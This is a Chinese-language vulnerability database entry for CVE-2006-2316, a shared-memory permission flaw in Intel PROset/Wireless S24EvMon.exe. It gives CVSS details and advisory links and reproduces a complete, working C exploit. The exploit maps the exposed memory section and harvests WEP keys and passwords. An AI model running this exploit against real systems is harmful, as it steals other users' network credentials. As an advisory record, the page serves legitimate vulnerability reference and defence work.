CVE-2006-2316
CVSS4.9
发布时间 :2006-05-11 20:02:00
修订时间 :2011-03-07 21:35:57
NMCOE    

[原文]S24EvMon.exe in the Intel PROset/Wireless software, possibly 10.1.0.33, uses a S24EventManagerSharedMemory shared memory section with weak permissions, which allows local users to read or modify passwords or other data, or cause a denial of service.


[CNNVD]Intel PROset/Wireless S24EvMon.exe 本地信息泄露漏洞(CNNVD-200605-221)

        Intel PROset/Wireless软件(可能是10.1.0.33版本)中的S24EvMon.exe使用具有较弱权限的S24EventManagerSharedMemory共享内存部分,这会使本地用户读取或修改密码或其它数据,或造成拒绝服务。

- CVSS (基础分值)

CVSS分值: 4.9 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2316
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2316
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-221
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1737
(UNKNOWN)  VUPEN  ADV-2006-1737
http://www.securityfocus.com/bid/17914
(UNKNOWN)  BID  17914
http://www.securityfocus.com/archive/1/archive/1/433133/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060502 Intel wireless service s24evmon.exe confidential information disclosure.
http://www.reversemode.com/index.php?option=com_content&task=view&id=10&Itemid=1
(UNKNOWN)  MISC  http://www.reversemode.com/index.php?option=com_content&task=view&id=10&Itemid=1
http://xforce.iss.net/xforce/xfdb/26317
(UNKNOWN)  XF  intel-s24evmon-information-disclosure(26317)
http://securitytracker.com/id?1016621
(UNKNOWN)  SECTRACK  1016621
http://securityreason.com/securityalert/877
(UNKNOWN)  SREASON  877
http://secunia.com/advisories/20001
(UNKNOWN)  SECUNIA  20001

- 漏洞信息

Intel PROset/Wireless S24EvMon.exe 本地信息泄露漏洞
中危 访问验证错误
2006-05-11 00:00:00 2006-05-12 00:00:00
本地  
        Intel PROset/Wireless软件(可能是10.1.0.33版本)中的S24EvMon.exe使用具有较弱权限的S24EventManagerSharedMemory共享内存部分,这会使本地用户读取或修改密码或其它数据,或造成拒绝服务。

- 公告与补丁

        暂无数据

- 漏洞信息 (1772)

Intel Wireless Service (s24evmon.exe) Shared Memory Exploit (EDBID:1772)
windows local
2006-05-09 Verified
0 Ruben Santamarta
N/A [点击下载]
///////////////////////////////////////////////////////////////////////
////  S24EvMon.exe Intel Wireless Management Service KEY Hunter
////  Rubén Santamarta
////  ruben@reversemode.com
////  www.reversemode.com
////  28/04/2006
///////////////////////////////////////////////////////////////////////

/**********************************************************************************************************
 * Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe. 
 * It is a service which is part (at least) of the Intel PROset/Wireless software. This application 
 * is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets.
 *
 * This service uses a shared memory section which is created without the proper security descriptor, 
 * allowing unprivileged users to perform operations like Delete, Read or Write into the memory. The 
 * section is named S24EventManagerSharedMemory
 * 
 * This shared memory is used to store ,in plain text, confidential information like WEP Key, Passwords...
 *
 * The successful exploitation of this vulnerability could allow to any unprivileged user to access 
 * confidential information,exposing the network. An important mitigating factor is that the 
 * vulnerability is local, nevertheless some Malware could take advantage of this flaw. 
 **********************************************************************************************************/

#include <windows.h>
#include <stdio.h>

#define InitializeObjectAttributes( p, n, a, r, s ) {	\
     (p)->Length = sizeof( OBJECT_ATTRIBUTES );         \
     (p)->RootDirectory = r;                            \
     (p)->Attributes = a;                               \
     (p)->ObjectName = n;                               \
     (p)->SecurityDescriptor = s;                       \
     (p)->SecurityQualityOfService = NULL;              \
     }

#define InitializeUnicodeStr(p,s) {			\
     (p)->Length= wcslen(s)*2;				\
     (p)->MaximumLength = wcslen(s)*2+2;		\
     (p)->Buffer = s;					\
     }


typedef struct _SECTION_BASIC_INFORMATION {
  ULONG                   d000;
  ULONG                   SectionAttributes;
  LARGE_INTEGER           SectionSize;
} SECTION_BASIC_INFORMATION;

typedef struct _LSA_UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength; 
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING *ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        
    PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES;



typedef DWORD (WINAPI* PQUERYSECTION)(HANDLE, DWORD, PVOID,DWORD,DWORD*);

typedef DWORD (WINAPI* POPENSECTION)(HANDLE*, DWORD,OBJECT_ATTRIBUTES* );


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}



int main(int argc, char* argv[])
{
 OBJECT_ATTRIBUTES SectionAttributes;
 SECTION_BASIC_INFORMATION buff;
 PQUERYSECTION NtQuerySection;
 POPENSECTION NtOpenSection;
 char * sMap,cString[256];
 UNICODE_STRING uStr;
 LPVOID lpMapAddress;
 DWORD i,b=0,c=0;
 HANDLE hSection;


NtOpenSection = (POPENSECTION) GetProcAddress( LoadLibrary( "ntdll.dll" ),
						   "NtOpenSection" );

NtQuerySection = (PQUERYSECTION) GetProcAddress( LoadLibrary( "ntdll.dll"),
						 "NtQuerySection" );

InitializeUnicodeStr(&uStr,L"\\BaseNamedObjects\\S24EventManagerSharedMemory");
InitializeObjectAttributes(&SectionAttributes, &uStr,NULL, NULL, NULL );	


NtOpenSection( &hSection, SECTION_MAP_READ|SECTION_QUERY,  &SectionAttributes );
 
if (hSection == NULL) ShowError();
printf("Section opened successfully.\n"); 
 

lpMapAddress = MapViewOfFile(hSection, FILE_MAP_READ, 0, 0, 0);
if (lpMapAddress == NULL) ShowError();
 
if (NtQuerySection(hSection,0,&buff,sizeof(buff),0)) ShowError();

sMap= ( char* )lpMapAddress;
printf("Scanning section...\n\n"); 

while(c<100)
{
 
 c++;
 printf("\nSNAPSHOT ID[%d]----------------[BEGIN]\n\n",c);
		
 for (i=0; i< buff.SectionSize.QuadPart; i++)
	{
	
		if( sMap[i]> 0x29  )
		{
			while( sMap[i] != 0x0 )
			{
				if( sMap[i]>=0x30 )
				{
					cString[b] = sMap[i];
					b++;
				}									
				i++;
			}
			
			cString[b++]='\0';
			// less 3 characters should be GARBAGE
			if( b>3 && b!=14 && b!=27 ) 	printf(" String collected: %s\n",cString);
			// Alphanumeric WEP KEY (13 characters)
			if( b==14 )	printf("### Possible Alphanumeric WEP KEY found: %s\n",cString);
			if( b==27 ) 
			{
                   		if(cString[0]!=0x30 && cString[2]!=0x30 && cString[6]!=0x30)
                       			printf("### Possible WEP KEY found(Ascii/HexMode): %s\n",cString);
                                else
                        		printf(" String collected: %s\n",cString);
                	}   
                	b=0;		
		}
			
	}
printf("\nSNAPSHOT ID[%d]----------------[END]\n",c);   

Sleep(1000);
}

CloseHandle(hSection);

return 0;
}

// milw0rm.com [2006-05-09]
		

- 漏洞信息

25357
Intel PROset/Wireless Software S24EvMon.exe Shared Memory Disclosure
Wireless Vector
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站